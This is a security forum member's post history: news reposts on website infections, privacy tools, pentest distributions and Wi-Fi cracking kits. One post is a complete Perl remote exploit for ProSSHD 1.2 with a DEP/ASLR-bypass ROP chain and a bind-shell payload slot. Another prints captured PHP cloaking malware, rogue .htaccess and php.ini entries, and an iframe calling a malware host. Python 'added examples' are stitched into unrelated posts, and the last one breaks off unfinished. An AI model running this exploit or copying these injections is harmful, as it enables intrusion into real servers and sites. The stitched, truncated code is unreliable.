begood

Active Members
  • Posts

    3972
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by begood

  1. keep them coming! (everyone can contribute, not just nytro.) Double posting is allowed in this thread. Note: I only want programs you actually use, don't throw in just anything at random.
  2. I decided to create a VirtualBox image to help pentesters, people interested in virus analysis & detection, and others. A short description: a VirtualBox image is a virtual version of an operating system, an emulator. Version v0.1 alpha (the current one) contains Windows XP SP3, enhanced with the minimum necessary programs and tweaked for optimal security, along with high operating system stability. RAM consumption is minimal, for high performance. As I said above, this is the first version, still in the testing stage. As the project evolves, we will offer a varied range of versions optimized for different areas: programming, pentesting, recovery, malware analysis etc. More details along with a video presentation can be found on my blog: a2480f25: Windows XP SP3 RSTCore Edition v0.1. Whoever wants the first version, send me a PM and you will receive a torrent file.

    UPDATE 2012:
    http://docs.rtfm.us/Users/begood/rstcore/
    http://filecloud.io/yezs78ga
    http://filecloud.io/jw73a049
    http://filecloud.io/mb8tox26
    http://filecloud.io/s28zuykd
    http://filecloud.io/n8vx7c31
    http://filecloud.io/6m0qrdk5
    http://filecloud.io/24ydtjkh
  3. Here I will post updates about the project I am currently working on, the "RSTcore Project".
  4. Kernel32.dll is a dynamic link library present in all 32-bit and 64-bit versions of Microsoft Windows. It exposes to applications most of the Win32 base APIs, such as memory management, input/output operations, (process and thread) creation, and synchronization functions. In this video Spiffomatic64 shows us how to patch Kernel32 by using OllyDbg. He demonstrates the power of patching with a simple example where he swaps filenames in a function call with the DLL. The patching mechanism works by putting an unconditional jump instruction at the beginning of the function to be patched and then pointing the jump to a location in the .text segment where the attacker's code resides. Once the attacker's code is executed, control is transferred back to the original function code. Of course, the attacker's code needs to ensure that all the state (registers, flags etc) is saved before his code executes and then restored to its original state before returning control to the original function code. He also needs to execute the code he replaced with the unconditional jump instruction before passing control back. This will ensure that the system does not crash or behave unexpectedly when control is given back. Spiffomatic64 demos this entire process in depth and detail. This video is very important in understanding rootkits, as most of them use similar techniques to take control and camouflage their presence in an infected system. There is a fair bit of assembly language involved in this video. If you are unfamiliar with Assembly Language programming, then begin with the 12 part Assembly Language Primer for Hackers which we created a while back. It is important to note that our tutorial used the AT&T syntax while this video uses the Intel syntax for Assembly language. Thanks go out to Spiffomatic64 for submitting this video to SecurityTube. You can visit his site here. This is a recommended watch for people interested in rootkits and other malware.
Patching Kernel32 for Fun and Profit Tutorial
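Added example, not part of begood's post or of the SecurityTube video: a Python check for the patch pattern the post describes, decoding the first instruction at a function entry and reporting where a JMP or PUSH/RET redirects control, and whether that destination still lies inside the module (a code cave in .text) or outside it. The module base, size, function address and entry bytes are constructed placeholders, not values from a real kernel32 build.

```python
import struct

# Entry-point patterns an inline patch leaves behind. A clean XP-era kernel32
# export begins with the hot-patchable prologue
# "mov edi, edi / push ebp / mov ebp, esp" (8B FF 55 8B EC), not a jump.
CLEAN = "clean"
JMP_REL32 = "jmp rel32"      # E9 xx xx xx xx  (the unconditional jump the post describes)
JMP_REL8 = "jmp rel8"        # EB xx
JMP_INDIRECT = "jmp [mem]"   # FF 25 xx xx xx xx
PUSH_RET = "push/ret"        # 68 xx xx xx xx C3


def inspect_prologue(code, func_addr, module_base, module_size):
    """Decode the first instruction at a function entry.

    Returns (kind, target, target_in_module). target is the absolute address
    control is redirected to (None for a clean prologue); target_in_module says
    whether it still lies inside the module, as a code-cave detour would.
    """
    if len(code) < 6:
        raise ValueError("need at least 6 bytes of the function entry")
    kind, target = CLEAN, None
    if code[0] == 0xE9:
        rel = struct.unpack_from("<i", code, 1)[0]
        kind, target = JMP_REL32, (func_addr + 5 + rel) & 0xFFFFFFFF
    elif code[0] == 0xEB:
        rel = struct.unpack_from("<b", code, 1)[0]
        kind, target = JMP_REL8, (func_addr + 2 + rel) & 0xFFFFFFFF
    elif code[0] == 0xFF and code[1] == 0x25:
        # reports the pointer slot; the real destination is read from memory
        kind, target = JMP_INDIRECT, struct.unpack_from("<I", code, 2)[0]
    elif code[0] == 0x68 and code[5] == 0xC3:
        kind, target = PUSH_RET, struct.unpack_from("<I", code, 1)[0]
    in_module = target is not None and module_base <= target < module_base + module_size
    return kind, target, in_module


def scan_exports(exports, module_base, module_size):
    """exports: {name: (address, first bytes)}. Returns one finding per export
    whose entry is not a normal prologue."""
    findings = []
    for name, (addr, code) in exports.items():
        kind, target, in_module = inspect_prologue(code, addr, module_base, module_size)
        if kind != CLEAN:
            findings.append((name, kind, target, in_module))
    return findings


# Constructed sample: a hypothetical module at 0x7C800000 with one export at
# 0x7C80EA11, shown clean and with several redirection patterns. None of these
# values come from a real kernel32 image.
MODULE_BASE = 0x7C800000
MODULE_SIZE = 0xF6000
FUNC_ADDR = 0x7C80EA11
SAMPLES = {
    "clean_export":  (FUNC_ADDR, bytes.fromhex("8BFF558BEC83")),
    "jmp_in_module": (FUNC_ADDR, bytes.fromhex("E9EA150E0090")),  # -> 0x7C8F0000 (cave in .text)
    "jmp_to_heap":   (FUNC_ADDR, bytes.fromhex("E9EA15C08390")),  # -> 0x00410000 (outside module)
    "short_jmp":     (FUNC_ADDR, bytes.fromhex("EB0E90909090")),  # -> 0x7C80EA21
    "push_ret":      (FUNC_ADDR, bytes.fromhex("6800008F7CC3")),  # -> 0x7C8F0000
}

if __name__ == "__main__":
    for name, kind, target, in_module in scan_exports(SAMPLES, MODULE_BASE, MODULE_SIZE):
        where = "inside module" if in_module else "OUTSIDE module"
        print(f"{name}: {kind} -> 0x{target:08X} ({where})")
```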
  5. The internet sure is an interesting place. [uploaded: December 03, 2009]
  6. begood

    Benvenuto :>

    No messenger-speak. No colours and no caps lock.
  7. Update 2: Simple clean up solution: Sucuri Security: Simple cleanup solution for the latest Wordpress hack

    Update 1: Note that we are not blaming Wordpress here. I am assuming that if the problem was on Wordpress itself, the number of infected sites would be much, much bigger. Maybe a plugin is vulnerable or someone stole lots of passwords. Also, all the hacked sites were on shared hosts, none so far on a private server.

    We are seeing multiple reports today of Wordpress sites (running their latest version) getting compromised. The initial reports today were restricted only to Dreamhost, but now we are seeing the same pattern on blogs hosted at GoDaddy, Bluehost, Media Temple and other places. So, it doesn't look like something specific to a hosting company. The only thing in common is that all of them are on shared servers.

    All those sites had this javascript added to their pages:
    http://www.indesignstudioinfo.com/ls.php
    http://zettapetta.com/js.php

    Which came from a long base64 encoded string added to their footer.php file (or to all the PHP files in some cases). You can get more information about the encoded string here (and the final decoded code): Sucuri Security

    One thing very interesting that is becoming a trend is that the malware is also hiding from Google. This causes the site not to get blacklisted, making it harder for the owner to notice.

    People are talking on the forums already:
    WordPress › Support 2.9.2 site hacked
    http://www.webhostingtalk.com/showthread.p..
    http://collabtive.o-dyn.de/forum/view..

    How are they getting hacked? We have no clue yet... We can only restrict it to a few possible issues:
    - Stolen FTP/WP password
    - Bug in Wordpress
    - Bug in some Wordpress plugin
    - Brute force attack against the passwords

    Send us more information if you know something. The guys from WP Security Lock did a good thread on the issue. You can read it here. Sucuri Security: New attack today against Wordpress
  8. Just a few days after the bug that let users see their friends' personal chats, another Facebook bug was discovered yesterday, and this one was adding applications to your Facebook profile without your knowledge or authorization. If you surf to sites that have Facebook integration while you are logged in to Facebook, chances are your profile has had a few of those added. Facebook spokesman David Swain said to Macworld that the bug has been fixed and that no information was shared with those applications, but it remains to be seen if Facebook will notify every user - since the only way to remove these unauthorized applications is to do it manually. Also, the question is: do you trust Facebook when it tells you that no information was shared? How would you know if it was? To remove the unauthorized applications, go to your Facebook Account details (top right corner), select the Application Settings option from the drop-down menu and delete unwanted applications by clicking on the "X" mark. I would also recommend editing the settings for those applications you want to keep using - browse through them and see what you want to share with whom and what you permit the application to do. These latest privacy changes have wreaked havoc on Facebook, so this is the right time to consider which information could be too sensitive to be provided in your account. New Facebook bug adds unauthorized apps to your profile
  9. http://rstcenter.com/forum/22355-technique-quick-exploitation-double-blind-sql-injection.rst
  10. Rogue = fake (in this case). I wonder if it was deliberately named RST?
  11. RST Antivirus 2010 is a rogue security application. In order to remove it, find out what files and registry entries to look for below. Known system changes:

    Files
    c:\Desktop\RST Antivirus 2010.lnk

    Folders
    c:\StartMenu\RST Antivirus 2010
    c:\ProgramFiles\RST Antivirus 2010

    Registry entries
    Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0933F968-51E5-4780-B485-CE2DCE47E8F6}

    // RST antivirus, what the fuck?
  12. About

    GoogleSharing is a special kind of anonymizing proxy service, designed for a very specific threat. It ultimately aims to provide a level of anonymity that will prevent Google from tracking your searches, movements, and what websites you visit. GoogleSharing is not a full proxy service designed to anonymize all your traffic, but rather something designed exclusively for your communication with Google. Our system is totally transparent, with no special "alternative" websites to visit. Your normal work flow should be exactly the same.

    The Basic Problem

    Google thrives where privacy does not. If you're like most internet users, Google knows more about you than you might be comfortable with. Whether you were logged in to a Google account or not, they know everything you've ever searched for, what search results you clicked on, what news you read, and every place you've ever gotten directions to. Most of the time, thanks to things like Google Analytics, they even know which websites you visited that you didn't reach through Google. If you use Gmail, they know the content of every email you've ever sent or received, whether you've deleted it or not. They know who your friends are, where you live, where you work, and where you spend your free time. They know about your health, your love life, and your political leanings. These days they are even branching out into collecting your realtime GPS location and your DNS lookups. In short, not only do they know a lot about what you're doing, they also have significant insight into what you're thinking.

    Where GoogleSharing Comes In

    GoogleSharing is a system that mixes the requests of many different users together, such that Google is not capable of telling what is coming from whom. GoogleSharing aims to do a few very specific things:
    - Provide a system that will prevent Google from collecting information about you from services which don't require a login.
    - Make this system completely transparent to the user. No special websites, no change to your work flow.
    - Leave your non-Google traffic completely untouched, unredirected, and unaffected.

    The GoogleSharing system consists of a custom proxy and a Firefox Addon. The proxy works by generating a pool of GoogleSharing "identities," each of which contains a cookie issued by Google and an arbitrary User-Agent for one of several popular browsers. The Firefox Addon watches for requests to Google services from your browser, and when enabled will transparently redirect all of them (except for things like Gmail) to a GoogleSharing proxy. There your request is stripped of all identifying information and replaced with the information from a GoogleSharing identity. This "GoogleShared" request is then forwarded on to Google, and the response is proxied back to you. Your next request will get a different identity, and the one you were using before will be assigned to someone else. By "sharing" these identities, all of our traffic gets mixed together and is very difficult to analyze. The GoogleSharing proxy even constantly injects false but plausible search requests through all the identities. The result is that you can transparently use Google search, images, maps, products, news, etc... without Google being able to track you by IP address, Cookie, or any other identifying HTTP headers. And only your Google traffic is redirected. Everything else from your browser goes directly to its destination.

    GoogleSharing Transport

    Where Google has failed to provide universal HTTPS support, we have. All requests to a GoogleSharing proxy are sent via HTTPS. These eventually have to be proxied out as HTTP from GoogleSharing to Google, but your traffic is encrypted on the first path.

    Running A GoogleSharing Proxy

    We've made the proxy code available so that anyone can run a GoogleSharing proxy instance in addition to the one that we're running. GoogleSharing :: A Special Kind Of Proxy
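Added example, not code from the GoogleSharing project: a small Python model of the identity-mixing step described above (strip the identifying headers, borrow the next identity from a shared pool, leave login services and non-Google hosts untouched). The identity cookies, User-Agents and the two users' traffic are constructed placeholders; the class name SharingProxy and the header list are assumptions of this model, not the real addon's names.

```python
import itertools
from urllib.parse import urlsplit

# Pool of shared identities: a Google-issued cookie plus a popular browser's
# User-Agent each. Constructed placeholder values.
IDENTITY_POOL = [
    {"Cookie": "PREF=ID=constructed-identity-1", "User-Agent": "Mozilla/5.0 (Windows NT 5.1) Firefox/3.6"},
    {"Cookie": "PREF=ID=constructed-identity-2", "User-Agent": "Mozilla/5.0 (Macintosh) Safari/531.22"},
    {"Cookie": "PREF=ID=constructed-identity-3", "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0)"},
]
# Login-bound services are exempt, as the text says the addon does for Gmail.
LOGIN_HOSTS = {"mail.google.com", "accounts.google.com"}
# Request headers that tie a request to the person sending it (assumed list).
IDENTIFYING_HEADERS = {"cookie", "user-agent", "referer", "x-forwarded-for", "client-ip", "via"}


def is_google_host(host):
    return host == "google.com" or host.endswith(".google.com")


class SharingProxy:
    def __init__(self, pool):
        self.pool = pool
        self._rotation = itertools.cycle(range(len(pool)))

    def should_share(self, url):
        host = (urlsplit(url).hostname or "").lower()
        return is_google_host(host) and host not in LOGIN_HOSTS

    def handle(self, url, headers):
        """Return (identity_index, outbound_headers).

        Non-Google and login traffic passes through untouched with index None.
        A shared request loses its identifying headers and wears the next
        identity from the pool, so consecutive requests get different ones."""
        if not self.should_share(url):
            return None, dict(headers)
        idx = next(self._rotation)
        outbound = {k: v for k, v in headers.items() if k.lower() not in IDENTIFYING_HEADERS}
        outbound.update(self.pool[idx])
        return idx, outbound


def simulate(proxy, requests):
    """requests: list of (user, url, headers). Returns {identity_index: set(users)},
    i.e. which users ended up behind each shared identity (None = passed through)."""
    seen = {}
    for user, url, headers in requests:
        idx, _ = proxy.handle(url, headers)
        seen.setdefault(idx, set()).add(user)
    return seen


# Constructed traffic from two users; the cookies are placeholders.
TRAFFIC = [
    ("alice", "http://www.google.com/search?q=cats", {"Cookie": "PREF=ID=alice-real", "User-Agent": "AliceBrowser/1.0"}),
    ("bob",   "http://www.google.com/search?q=dogs", {"Cookie": "PREF=ID=bob-real", "User-Agent": "BobBrowser/2.0"}),
    ("alice", "http://maps.google.com/?q=Bucharest", {"Cookie": "PREF=ID=alice-real", "User-Agent": "AliceBrowser/1.0"}),
    ("bob",   "http://news.google.com/", {"Cookie": "PREF=ID=bob-real", "User-Agent": "BobBrowser/2.0"}),
    ("alice", "https://mail.google.com/mail/", {"Cookie": "GX=alice-session"}),
    ("bob",   "http://example.org/", {"Cookie": "sid=bob-example"}),
]

if __name__ == "__main__":
    for idx, users in simulate(SharingProxy(IDENTITY_POOL), TRAFFIC).items():
        label = "passed through" if idx is None else f"identity {idx}"
        print(f"{label}: {sorted(users)}")
```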
  13. //or like this.
  14. # Exploit Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
    # Date: 03.05.2010
    # Author: Alexey Sintsov
    # Software Link: http://www.exploit-db.com/application/11618
    # Version: 1.2
    # Tested on: Windows XP SP3 / Windows 7
    # CVE :
    # Code :

    ################################################################################
    # Original exploit by S2 Crew [Hungary]
    # * * *
    # ROP for DEP and ASLR bypass by Alexey Sintsov from DSecRG [www.dsecrg.com]
    # * * *
    # Tested on: ProSSHD v1.2 on Windows XP and Windows 7 with DEP for all
    #
    # Special for XAKEP magazine [www.xakep.ru]
    #
    #
    # CVE: -

    #!/usr/bin/perl

    use Net::SSH2;

    $username = '';
    $password = '';

    $host = '192.168.126.129'; #Remote host
    #$host = '192.168.13.6';
    $port = 22;


    # windows/shell_bind_tcp - 368 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # LPORT=4444, RHOST=, EXITFUNC=process, InitialAutoRunScript=,
    # AutoRunScript=
    $shell =
    "";  # the 368 encoded payload bytes are omitted from this listing



    $fuzz = "\x41"x491 . # buffer before RET addr rewriting

    ############################### ROP
    # All ROP instructions from non ASLR modules (coming with ProSHHD distrib): MSVCR71.DLL and MFC71.DLL
    # For DEP bypass used VirtualProtect call from non ASLR DLL - 0x7C3528DD (MSVCR71.DLL)
    # this make stack executable:

    #### RET rewrite###
    "\x9F\x07\x37\x7C". # MOV EAX, EDI / POP EDI / POP ESI / RETN ; EAX points on our stack data with some offset

    "\x11\x11\x11\x11". # JUNK---------------^^^ ^^^
    "\x22\x22\x22\x22". # JUNK-------------------------^^^
    "\x27\x34\x34\x7C". # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10
    "\x33\x33\x33\x33". # JUNK------------------------------^^^

    "\xC1\x4C\x34\x7C". # POP EAX / RETN
                        # ^^^
    "\x33\x33\x33\x33". # ^^^
    "\x33\x33\x33\x33". # ^^^
    "\x33\x33\x33\x33". # ^^^
    "\x33\x33\x33\x33". # ^^^
                        # ^^^
    "\xC0\xFF\xFF\xFF". # ----^^^ Param for next instruction...
    "\x05\x1e\x35\x7C". # NEG EAX / RETN ; EAX will be 0x40 (param for VirtualProtect)

    "\xc8\x03\x35\x7C". # MOV DS:[ECX], EAX / RETN ; save 0x40 (3 param)
    "\x40\xa0\x35\x7C". # MOV EAX, ECX / RETN ; restore pointer in EAX

    "\xA1\x1D\x34\x7C". # DEC EAX / RETN ; Change position
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN ; EAX=ECX-0x0c

    "\x08\x94\x16\x7C". # MOV DS:[EAX+0x4], EAX / RETN ;save addres for VirtualProtect (1 param)

    "\xB9\x1F\x34\x7C". # INC EAX / RETN ; oh ... and move pointer back
    "\xB9\x1F\x34\x7C". # INC EAX / RETN
    "\xB9\x1F\x34\x7C". # INC EAX / RETN
    "\xB9\x1F\x34\x7C". # INC EAX / RETN ; EAX=ECX=0x8

    "\xB2\x01\x15\x7C". # MOV [EAX+0x4], 1 ; size for VirtualProtect (2 param)

    "\xA1\x1D\x34\x7C". # DEC EAX / RETN ; Change position for output from VirtualProtect
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN
    "\xA1\x1D\x34\x7C". # DEC EAX / RETN

    "\x27\x34\x34\x7C". # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10
    "\x33\x33\x33\x33". # JUNK------------------------------^^^

    "\x40\xa0\x35\x7C". # MOV EAX, ECX / RETN ; restore pointer in EAX
                        #
    "\x33\x33\x33\x33". #
    "\x33\x33\x33\x33". #
    "\x33\x33\x33\x33". #
    "\x33\x33\x33\x33". #

    "\xB9\x1F\x34\x7C". # INC EAX / RETN ; and again...
    "\xB9\x1F\x34\x7C". # INC EAX / RETN
    "\xB9\x1F\x34\x7C". # INC EAX / RETN
    "\xB9\x1F\x34\x7C". # INC EAX / RETN

    "\xE5\x6B\x36\x7C". # MOV DS:[EAX+0x14], ECX ; save output addr for VirtualProtect (4 param)

    "\xBA\x1F\x34\x7C"x204 . # RETN fill.....

    "\xDD\x28\x35\x7C". # CALL VirtualProtect / LEA ESP, [EBP-58] / POP EDI / ESI / EBX / RETN ;Call VirtualProtect
    "AAAABBBBCCCCDDDD". # Here is place for params (VirtualProtect)

    ####################### retrun into stack after VirtualProtect
    "\x1A\xF2\x35\x7C". # ADD ESP, 0xC / RETN ; take next ret
    "XXXYYYZZZ123". # trash
    "\x30\x5C\x34\x7C". # 0x7c345c2e: ANDPS XMM0, XMM3 -- (+0x2 to address and....) --> PUSH ESP / RETN ; EIP=ESP

    "\x90"x14 . # NOPs here is the begining of shellcode

    $shell; # shellcode 8)


    $ssh2 = Net::SSH2->new();
    $ssh2->connect($host, $port) || die "\nError: Connection Refused!\n";
    $ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
    #sleep(10);
    $scpget = $ssh2->scp_get($fuzz);
    $ssh2->disconnect();
  15. WeakNet is actively updating its database and tools. For this reason, a new version of WeakNet is available. It is WeakNet version 4! Our first post regarding Weaknet can be found here. "WeakNet Linux is designed primarily for penetration testing, forensic analysis and other security tasks." This is the official change log:

    - Weakerthan kernel version 1.0
    - Technician utilities (i am a computer tech for dell and apple and these utilities help out immensely on a daily basis.)
    - More wireless penetration utilities, including FreeRADIUS WPE edition, AIRPWN, properly recompiled custom Kismet
    - Better wireless adapter support for penetration testing with Ath9k, Ath5k, Rt73USB, and now Broadcom drivers have been patched for injection as well.
    - Autoload of X windows (Fluxbox) but no GDM (faster loading and boot time)
    - More non-hacker-pentest applications (all of these are accessed from right clicking anywhere on the fluxbox desktop)
    - More custom designed assistant applications to help those in need of wifi help and networking help, but without the bloated services like wicd or network-manager, etc.
    - More networking utilities for clients, including vnc, filezilla, and more.
    - Better MITM support and applications, including auto scanning for hosts via a custom made GUI application (the custom made GUI apps are all perl/Tk so they take up not a lot of resources.)
    - No instant servers are automatically started (for faster boot time); the user can simply start them right from the desktop menu.
    - There is a laptop theft-lojack-like application which reveals the external IP and can be set up easily from the desktop menu to automatically Email a specified address the table results each hour. ***
    - There are many more additions and modifications to the Web Hacking Portal
    - This version's automatic user is "root"
    - VLC is included in this lite ISO, custom compiled to be run as root.
    - A new GUI battery status interface I coded,
    - Just about everything's theme has been updated and ISOLINUX looks much better than before with a custom splash image.
    - The new browser is Google Chrome – not Firefox3.5.
    - I completely filled the bookmarks bar in Google Chrome with TONS of security related links, technician links, developer links and more.
    - RAV hunter (Rogue av client finder)
    - SAM Hunter (automatic retrieval of SAM file for usage with chntpw to blank out administrator passwords on windows machines)

    UPDATE: WeakNet v4! - PenTestIT
    Download WeakNet Linux 4.0 for Linux - An Ubuntu-based Live DVD containing a variety of security tools. - Softpedia
  16. Dodgy salesmen in China are making money from long-known weaknesses in a Wi-Fi encryption standard, by selling network key-cracking kits for the average user. Wi-Fi USB adapters bundled with a Linux operating system, key-breaking software and a detailed instruction book are being sold online and at China's bustling electronics bazaars. The kits, pitched as a way for users to surf the Web for free, have drawn enough buyers and attention that one Chinese auction site, Taobao.com, had to ban their sale last year.

    With one of the "network-scrounging cards," or "ceng wang ka" in Chinese, a user with little technical knowledge can easily steal passwords to get online via Wi-Fi networks owned by other people. The kits are also cheap. A merchant in a Beijing bazaar sold one for 165 yuan ($24), a price that included setup help from a man at the other end of the sprawling, multistory building.

    The main piece of the kits, an adapter with a six-inch antenna that plugs into a USB port, comes with a CD-ROM to install its driver and a separate live CD-ROM that boots up an operating system called BackTrack. In BackTrack, the user can run applications that try to obtain keys for two protocols used to secure Wi-Fi networks, WEP (Wired Equivalent Privacy) and WPA (Wi-Fi Protected Access). After a successful attack by the applications, called Spoonwep and Spoonwpa, a user can restart Windows and use the revealed key to access its Wi-Fi network. To crack a WEP key, the applications exploit weaknesses in the protocol that have been known for years. For WPA, they capture data being transmitted over the wireless network and target it with a brute-force attack to guess the key. Security researchers said they did not know of similar kits sold anywhere besides China, even though tutorials on how to crack WEP have been online for years.

    The kits appear to be illegal in China and it is unclear who is bundling the software with the USB adapters. One of the adapter makers is Wifly-City, a company that operates a Wi-Fi network covering coffee shops and other areas in Taipei, Taiwan. A woman surnamed Ren who answered the phone at the company said it does not supply the software that often appears with its products. A developer of BackTrack said the operating system is meant for penetration testing, not malicious attacks. "It sounds like BackTrack is being abused in China for illegal purposes. This is done without our knowledge or approval," the developer, who goes by the name Muts, said in an e-mail.

    One of the kits took over an hour to crack the WEP key equivalent to the password "sugar" in a test attack on a personal router set up for the purpose using 40-bit encryption. "Depending on many factors, WEP keys can be extracted in a matter of minutes," Muts said. "I believe the record is around 20 seconds." The brute-force attacks on WPA encryption are less effective. But while WEP is outdated, many people still use it, especially on home routers, said one security researcher in China. That means an apartment building is bound to have WEP networks for a user to attack. Since the kits capture data packets to perform their attacks, they may also let a user steal sensitive personal information that a victim sends over a network, the researcher said.

    The kits have stayed popular despite Chinese laws against hacking. "No matter where you go, you can use the Internet for free," the researcher said. Wi-Fi key-cracking kits sold in China mean free Internet
  17. You have no connection to those sites, they don't belong to you. You asked users to check whether they are vulnerable or not, and in my book that is a request. It's possible I got carried away; there were 3 people today who jumped in with "hack my site too", all in hacking challenges. You could have brought it to my attention by private message, and it would have been sorted out if you had explained what your intentions were. You only posted a title and 3 links. If it was hard for you to explain there what you intended, then why should I justify myself?
  18. Update: We just heard back from Network Solutions and they explained the issue to us. It is also related to the US Treasury Department hack, because they are hosting at Netsol and got infected too. In their own words:

    "This past weekend, an application that we support on our hosting platform was exploited as we were in the process of fixing it. We believe we have fixed the issue and we were able to contain the number of potentially affected websites to less than 250."

    So the problem seems to be fixed and only 250 sites got hacked. Not too bad for a company of their size. I also have to point out that Network Solutions' response to this (and to the previous) incident was very good. They took responsibility, kept everyone updated and worked hard to fix the sites involved. There is never going to be a perfectly secure hosting solution (bugs happen), but being able to respond quickly is what we always want to see.

    Yes, I am tired of reporting those as you are probably tired of hearing them as well. But today we got reports from multiple site owners of new infections at Network Solutions. Some of them were using Wordpress, but some were not. So nobody can blame Wordpress this time. In fact, we just finished fixing a few of these sites and we have some info to share.

    *btw, some of them were hacked in the previous batch, but some were not. No correlation here.
    **I am not 100% sure of how this is happening. Different sites, different platforms, most of them updated. The only thing weird is that their cgi-bin had the drwxrws--x (suid bit checked). I will post an update when I get more info.

    Attack analysis

    This attack is happening in two ways:

    1- A new php.ini is created inside the cgi-bin directory. It looks like this:

    auto_append_file = /data/xx/yy//user/abc/cgi-bin/root

    2- A new .htaccess is created (or modified) to load a new php file:

    RewriteRule ^(.*)\.html$ /data/xx/user/yy/htdocs/file.php [L]
    RewriteRule ^(.*)\.htm$ /data/xx/user/yy/htdocs/file.php [L]

    Note that I am hiding the original paths to protect the innocent. Also, the "file.php" from the second case had different file names in each case.

    The "root" file inside the cgi-bin looks like the "counter.cgi" that we saw previously. The file.php is very interesting and you can see the full content here: http://sucuri.net/malware/MW:GREPADD:2. It not only checks if the request is coming from a bot, but also the operating system (Linux, FreeBSD, etc) and only displays the malware in certain cases:

    function detect_os() {
        global $os;
        $user_agent = $_SERVER['HTTP_USER_AGENT'];
        if ((eregi("Google", $user_agent)) or (eregi("gsa-crawler", $user_agent)) or
            (eregi("Yahoo", $user_agent)) or (eregi("msnbot", $user_agent)) or
            (eregi("Turtle", $user_agent)) or (eregi("Yandex", $user_agent)) or
            (eregi("YaDirectBot", $user_agent)) or (eregi("Rambler", $user_agent)) or
            (eregi("James Bond", $user_agent)) or (eregi("Ask Jeeves", $user_agent)) or
            (eregi("Baiduspider", $user_agent)) or (eregi("EltaIndexer", $user_agent)) or
            (eregi("GameSpyHTTP", $user_agent)) or (eregi("grub-client", $user_agent)) or
            (eregi("Slurp", $user_agent)) or (eregi("Pagebull", $user_agent)) or
            (eregi("Scooter", $user_agent)) or (eregi("Nutch", $user_agent)) or
            (eregi("Zeus", $user_agent)) or (eregi("WebAlta", $user_agent)) or
            (eregi("Wget", $user_agent)) or (eregi("bot", $user_agent)) or
            (eregi("ia_archiver", $user_agent))) {$os = "Bots";}
        elseif (ereg("Windows 95", $user_agent)) $os = "Windows 95";
        elseif (ereg("Windows NT 4", $user_agent)) $os = "Windows NT 4";
        elseif (ereg("Windows 98", $user_agent)) $os = "Windows 98";
        elseif (ereg("Win 9x 4.9", $user_agent)) $os = "Windows ME";
        elseif (ereg("Windows NT 5.0", $user_agent)) $os = "Windows 2000";
        elseif (ereg("Windows NT 5.1", $user_agent)) $os = "Windows XP";
        elseif (ereg("Windows NT 5.2", $user_agent)) $os = "Windows 2003";
        elseif (ereg("Windows NT 6.0", $user_agent)) $os = "Windows Vista";
        elseif (ereg("Windows NT 6.1", $user_agent)) $os = "Windows 7";
        elseif (ereg("Windows CE", $user_agent)) $os = "Windows CE";
        elseif (ereg("iPhone", $user_agent)) $os = "iPhone OS";
        elseif (ereg("Symbian", $user_agent)) $os = "Symbian OS";
        elseif (ereg("Linux", $user_agent)) $os = "Linux";
        elseif (ereg("SunOS", $user_agent)) $os = "SunOS";
        elseif (ereg("FreeBSD", $user_agent)) $os = "FreeBSD";
        elseif (ereg("NetBSD", $user_agent)) $os = "NetBSD";
        elseif (ereg("PPC;", $user_agent)) $os = "Pocket PC";
        elseif ((ereg("PPC", $user_agent)) or (eregi("Mac_PowerPC", $user_agent))) $os = "Power PC";
        elseif (ereg("Mac OS", $user_agent)) $os = "Mac OS";
        elseif (eregi("PlayStation", $user_agent)) $os = "PlayStation";
        elseif (ereg("Nintendo Wii", $user_agent)) $os = "Nintendo Wii";
        elseif (ereg("Nitro", $user_agent)) $os = "Nintendo DS";
        elseif (ereg("J2ME/MIDP", $user_agent)) $os = "Mobile phone";
        else $os = "Unknown OS :(";
    }

    At the end both show the same iframe to load malware:

    document.write('<iframe frameborder="0" onload=\' if (!this.src){ this.src="http://grepad.com/in.cgi?2"; this.height=0; this.width=0;} \'

    If you got infected, look at your php.ini or .htaccess file and remove the bad entries. If you are not sure, use our scanner to check it out. Sucuri Security: New infections today at Network Solutions
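Added example, not from the Sucuri post or its scanner: Python checks for the three indicators the post lists on an infected account, an auto_append_file (or auto_prepend_file) directive in a php.ini dropped into cgi-bin, .htaccess rewrites that hand static .html/.htm requests to a PHP file, and set-id bits on the cgi-bin directory. The sample php.ini, .htaccess and directory mode are constructed, reusing the masked paths from the post.

```python
import re
import stat

# Constructed samples modelled on the post's indicators (paths are the post's placeholders).
SAMPLE_PHP_INI = """\
; php.ini found inside cgi-bin
register_globals = Off
auto_append_file = /data/xx/yy//user/abc/cgi-bin/root
"""

SAMPLE_HTACCESS = r"""RewriteEngine On
RewriteRule ^(.*)\.html$ /data/xx/user/yy/htdocs/file.php [L]
RewriteRule ^(.*)\.htm$ /data/xx/user/yy/htdocs/file.php [L]
RewriteRule ^blog/(.*)$ /index.php?p=$1 [L]
"""

CLEAN_HTACCESS = "RewriteEngine On\nRewriteRule ^blog/(.*)$ /index.php?p=$1 [L]\n"

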